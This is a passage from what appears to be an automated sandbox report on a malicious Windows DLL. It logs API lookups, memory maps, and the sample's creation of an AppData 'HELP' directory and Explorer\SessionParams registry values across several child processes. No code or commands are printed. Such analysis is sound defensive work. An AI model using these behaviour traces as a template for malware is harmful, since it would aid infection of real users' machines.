1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (6)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94193 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 | |
| Get Info | type = Operating System |
|
1 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #10: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #10 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomS /fn_args="0" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xac8 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
ACC
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x00187fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x00190fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000210000 | 0x00210000 | 0x0030ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000310000 | 0x00310000 | 0x003affff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000003f0000 | 0x003f0000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000004f0000 | 0x004f0000 | 0x005f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000006c0000 | 0x006c0000 | 0x006cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000006d0000 | 0x006d0000 | 0x0086ffff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffda000 | 0x7ffda000 | 0x7ffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
2 | |
| Get Time | type = Ticks, time = 94271 |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #11: gorctexxzx.exe
150
0
| Information | Value |
|---|---|
| ID | #11 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=AddAtomT /fn_args="0" |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:31, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:58 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xad4 |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
AD8
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000210000 | 0x00210000 | 0x002d7fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000002f0000 | 0x002f0000 | 0x003effff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x00000000003f0000 | 0x003f0000 | 0x004f0fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000570000 | 0x00570000 | 0x0057ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000580000 | 0x00580000 | 0x0117ffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x0000000001200000 | 0x01200000 | 0x0129ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000012a0000 | 0x012a0000 | 0x0135ffff | Private Memory | Readable, Writable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72ee0000 | 0x72f24fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd3000 | 0x7ffd3000 | 0x7ffd3fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (32)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
6 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Timout, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IsActive, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = BSlp, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = SDCnt, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, type = REG_BINARY |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = EmtParam, data = 0, type = REG_NONE |
|
